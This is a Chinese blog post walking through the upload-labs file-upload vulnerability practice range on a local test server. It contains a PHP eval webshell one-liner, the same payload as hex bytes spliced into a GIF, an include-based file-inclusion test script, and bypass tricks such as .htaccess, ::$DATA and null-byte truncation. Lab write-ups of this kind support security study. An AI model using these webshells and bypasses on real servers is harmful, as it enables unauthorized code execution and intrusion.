Upload靶场通关笔记

已于 2023-06-28 11:03:56 修改
阅读量422 收藏 1
点赞数
文章标签: 笔记 php 开发语言
于 2023-06-26 15:46:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/131398709
版权

文章目录


在这里插入图片描述

一、Pass-01

在这里插入图片描述在这里插入图片描述

1.抓包上传

只能上传jpg,png,gif格式图片,因此先选一个jpg,然后抓包修改文件类型和文件数据

在这里插入图片描述在这里插入图片描述在这里插入图片描述

2.获取上传路径

接下来需要知道文件上传到哪个目录下
在这里插入图片描述

可以看出上传到上一级目录的upload文件夹了,而当前目录是
http://127.0.0.1/upload/Pass-01/index.php,即http://127.0.0.1/upload/Pass-01/
因此上一级目录是http://127.0.0.1/upload/
即最终上传路径是http://127.0.0.1/upload/upload/
可以看出已上传成功,接下来用工具连接验证下

3.工具验证

在这里插入图片描述

F12解析成功
在这里插入图片描述

说明连接和调用成功

二、Pass-02

还是用上一题的办法

<?php @eval($_POST["fname"]);?>

Content-Type: image/jpeg
Content-Type:application/octet-stream
在这里插入图片描述
在这里插入图片描述

三、Pass-03

不出所料不能用老办法了
在这里插入图片描述

1.使用httpd.conf自定义后缀

那就改后缀绕过,改成3.phtml
在这里插入图片描述
在这里插入图片描述

2.提取上传文件名

在这里插入图片描述

发现可以上传,但是文件名被改了,没关系可以提取,202306261154331548.phtml
验证下看能不能解析,发现不行
在这里插入图片描述

3.工具测试

猜测应该是我的皮卡丘版本较老,换装新版本试下
在这里插入图片描述在这里插入图片描述

菜刀也连接成功了
在这里插入图片描述

4.注意点

值得说明的是一句话代码那里第一个空行不要删,不然上传不会成功的
在这里插入图片描述

四、Pass-04

在这里插入图片描述

显然phtml也被禁了,不信你可以试下
在这里插入图片描述

1.上传.htaccess

尝试使用.htaccess文件,先上传它
在这里插入图片描述

2.上传图片

然后上传图片,只要加一句话木马就行,其他不用改
在这里插入图片描述

3.工具测试

测试下
在这里插入图片描述
在这里插入图片描述在这里插入图片描述

五、Pass-05

在这里插入图片描述

好吧,这关.htaccess也不能用了
大小写绕过
但是Php是不是可以呢
在这里插入图片描述

上传成功,试下能不能运行
在这里插入图片描述在这里插入图片描述

OK 搞定

六、Pass-06

在这里插入图片描述

1.空格+.号绕过

试了下大小写绕过失败,.htaccess上传失败
最后用这种奇怪的方法组合绕过了,即空格+.号绕过
在这里插入图片描述

2.工具测试

在这里插入图片描述在这里插入图片描述

七、Pass-07

在这里插入图片描述

同上题绕法
这个狠,试下上题的方法先
在这里插入图片描述

这次也上传成功了
在这里插入图片描述

工具测试
在这里插入图片描述在这里插入图片描述

OK 搞定

八、Pass-08

在这里插入图片描述在这里插入图片描述

这次不行了

1.特殊符号绕法

试下特殊符号绕法:1.php::$DATA
在这里插入图片描述

果然可以

2.工具测试

在这里插入图片描述在这里插入图片描述

OK 搞定

九、Pass-09

在这里插入图片描述

1.特殊符号+.+空格组合绕过

在这里插入图片描述

2.工具测试

在这里插入图片描述

看来这个也没问题了

十、Pass-10

在这里插入图片描述在这里插入图片描述

1.双写绕过

发现会把php去掉,那就来个双写绕过
在这里插入图片描述

很好,上传成功
在这里插入图片描述

2.工具测试

在这里插入图片描述在这里插入图片描述

OK 搞定

十一、Pass-11

在这里插入图片描述

经尝试,双写绕过失败,特殊符号绕过失败
在这里插入图片描述

00截断绕过
11.php%00.jpg,11.jpg%00.php
这里我们使用00截断绕过,此外还需修改content-Type这个值,因为这样jpg也可以解析了
如下图所示,save_path在上面,说明是get型00截断
在这里插入图片描述

在filename=XX.php%00.jpg
在这里插入图片描述
在这里插入图片描述

十二、Pass-12

在这里插入图片描述

save_path在下面,说明是post型00截断
post型的需要在upload后面追加 XX.php ,php后面有空格
在这里插入图片描述

然后切换到16进制页面,找到空格的位置
在这里插入图片描述

将20改成00
在这里插入图片描述

然后放包
但是失败了
在这里插入图片描述

经查:在php 5.3.4中php修复了0字符,但是在之前的版本中00在php中危害较大
在这里插入图片描述

1.00截断条件1

而我的PHP是5.4.45因此尝试下降级
在这里插入图片描述

2.00截断条件2

其次php.ini中的magic_quotes_gpc是必须off状态的
在这里插入图片描述

3.空格a替换

然后我们在12.php后面加:空格a,a是方便定位,空格16进制换成00后就可以上传php文件了
在这里插入图片描述
在这里插入图片描述

4.工具测试

在这里插入图片描述

十三、Pass-13

在这里插入图片描述

这节应该需要做内容绕过
文件内容绕过:
JPG:JPGGraphicFile;gif:GIF89A,zip:ZipCompressed
doc .xls .xlt .ppt .apr:MSCompoundDocumentv1orLotusApproachAPRfile

1.制作图片马

首先使用dos命令制作图片马
在这里插入图片描述
在这里插入图片描述

然后直接上传2.jpg
在这里插入图片描述

准备本地包含测试代码include.php

<?php
$file = $_GET['file'];
include $file;
?>

2.工具测试

在这里插入图片描述
在这里插入图片描述

十四、Pass-14

在这里插入图片描述

同上题
在这里插入图片描述

15关程序有问题,跳过

十五、Pass-16

在这里插入图片描述

1.制作图片马

首先制作图片马,这次使用gif
在这里插入图片描述

然后上传图片,但是发现上传后的图片被重新编码了,一句话代码找不到了
在这里插入图片描述

2.对比修改

使用EmEditor工具对比看下哪些地方没改
在这里插入图片描述

可以看出上图箭头处这块没动,因此可以将一句话木马替换进去,把左图下面这段复制出来
在这里插入图片描述

3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 50 4F 53 54 5B 22 66 6E 61 6D 65 22 5D 29 3B 3F 3E 1A 替换到1.gif这个位置,同时记住这里选了多少个字符,这里是96个
替换到箭头处开始的96个字符之后变成

3.替换未修改

变成
在这里插入图片描述

4.上传测试

然后将1.gif保存上传
在这里插入图片描述

上传成功了
说明没有被过滤掉
在这里插入图片描述

工具测试
在这里插入图片描述
在这里插入图片描述

十六、Pass-17

同上题做法

十七、Pass-18

被保存到上一级目录了,不过没关系还是可以跑
在这里插入图片描述
在这里插入图片描述

十八、Pass-19

同16关做法

十九、Pass-20

同16关做法

只为了拿0day
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
upload-libs】 文件上传漏洞靶场 详解 持续更新……
weixin_46497491的博客
10-07 1094
黑名单绕过,可以尝试大小写、双写,phtml、php3、php5等后缀方法尝试绕过,如果以上不能绕过,此处还有一种方法,可以尝试上传.htaccess文件,再上传图片马,jpg格式就可以,.htaccess文件会使当前目录的所有文件都解析成php(网上看到的方法,没有实践,感兴趣可以尝试一下)
upload-labs 08(字符串过滤)
LuckySec
11-07 371
题目 查看源码 分析,该代码没有对文件后缀名统一转字符串,导致在Windows下可以使用bp截断文件后缀添加 :: DATA进行绕过 小提示:Windows :: DATA备用数据流 备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。$ DATA备用流存在于每个文件,因此它可以是访问任何文件的替代方法。 验证 文件上传成功! ...
upload-labs pass-08
weixin_50339082的博客
06-24 183
upload-labs pass-08 Pass-08 先看一下源码(黑名单绕过–点号绕过): $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp
upload-labs通关-文件上传靶场-详细
qq_63283137的博客
09-12 782
upload-labs靶场详细教程
文件上传靶场upload-labs通关
p36273的博客
07-03 2715
upload-labs是一个专门用来练习文件上传靶场一共20关,现在,我们开始通关吧。
upload-labs靶场通关指南
07-02
Upload-labs靶场通关指南 Upload-labs靶场是一款文件上传漏洞靶场,旨在帮助安全研究员和渗透测试人员练习文件上传漏洞的检测和利用。本指南提供了 Upload-labs靶场通关指南,涵盖了从基础的文件上传漏洞到高级...
upload-labs通关手册
12-03
详细记录了upload-labs靶场通关步骤,并且附带有caidao和burpsuite工具资源,非常适合初学者!!!
Upload-labs通关手册.pdf
08-06
Upload-labs通关手册
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
安装upload-labs
10-22
1. 下载靶场文件:首先,您需要下载upload-labs靶场文件,可以从官方网站或其他可靠的渠道下载。 2. 解压到WWW目录下:将下载的靶场文件解压到WWW目录下,请注意不要嵌套文件夹,否则可能会导致安装失败。 3. 启动...
Upload-Labs-Pass-08
龙狼刺的博客
04-21 1129
一、相关知识 1、特殊符号绕过原理: Windows系统下,如果上传文件的文件名为test.php::$DATA,则会在服务器中生成一个为test.php文件,其中内容和所上传的文件内容相同,并被解析。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 三、文件上传 1、创建webshell 格式:weevely generate 密码 ...
[网络安全]upload-labs Pass-08 解题详析
等风来
08-15 4040
接着放包、复制文件上传路径、连接蚁剑即可。本文不再赘述。
ORACLE ERP导数据(BOM清单)
fangke的专栏
09-23 2283
方法:把数据导入BOM清单的方法是,把数据导入接口表中,让其自动运行既可。上传文件的时候,要注意使      用ASCII字符模式。1、自己建立一中转表drop table cux_bill_temp;create table cux_bill_temp(  bill_sequence_id  number,  assembly_item_id number,  organization_id n
从零开始的VUE项目-08(el-upload文件上传
木卯彳亍的博客
04-18 2897
这一篇中我们利用el-upload来做文件上传,效果如下: el_upload组件文档地址:https://element.eleme.cn/#/zh-CN/component/upload 1,在数据库的data表里加一个附件字段Attachment 2,在api后台文件夹的根目录新建Img文件夹 3,Data.cs添加附件字段,变为: using System; using System.Collections.Generic; using System.Linq.
Upload-labs 1-21关 靶场通关笔记(含代码审计)
m0_59598029的博客
02-25 1038
basename— 返回路径中的文件名部分给出一个包含有指向一个文件的全路径的字符串,本函数返回基本的文件名。Notebasename()纯粹基于输入字符串操作, 它不会受实际文件系统和类似 “..” 的路径格式影响。php?1) sudoers3) passwd4) etc5) .6)imagecreatefromgif():创建一块画布,并从 GIF 文件或 URL 地址载入一副图像。
element ui中实现upload文件、图片上传功能(el-upload)
熟悉JS拼写的FE
09-07 4521
vue结合Element实现文件上传 前言:一些信息化或后台项目开发中,避免不了上传文件的功能,这篇文章可以学会文件上传功能,这次我拿添加图片来实现此功能 需要准备一个oss云储存地址和element ui中upload组件 1. 第一步,先选择一个upload组件 这里我推荐大家选择手动上传的,这样不会因为选错文件而浪费oss资源(自动上传的小弊端) 我们复制代码做一些自己的改造,需要用到Dialog对话框 2.第二步,对代码进行改造 先放上template中代码 &
《计算机网络》(学习笔记
qiqi_liuliu的博客
07-24 2356
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)组成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络的网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
PHP商城案例
王世凡的技术博客
07-26 418
http://www.e9933.com/
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 760
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
upload-labs靶场通关
09-14
总结起来,完成upload-labs靶场通关,你需要使用move_uploaded_file函数将临时存储路径的文件移动到指定的上传目录,设置上传目录的路径,并确保上传的文件具有唯一的文件名。这样就能顺利通过upload-labs靶场了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值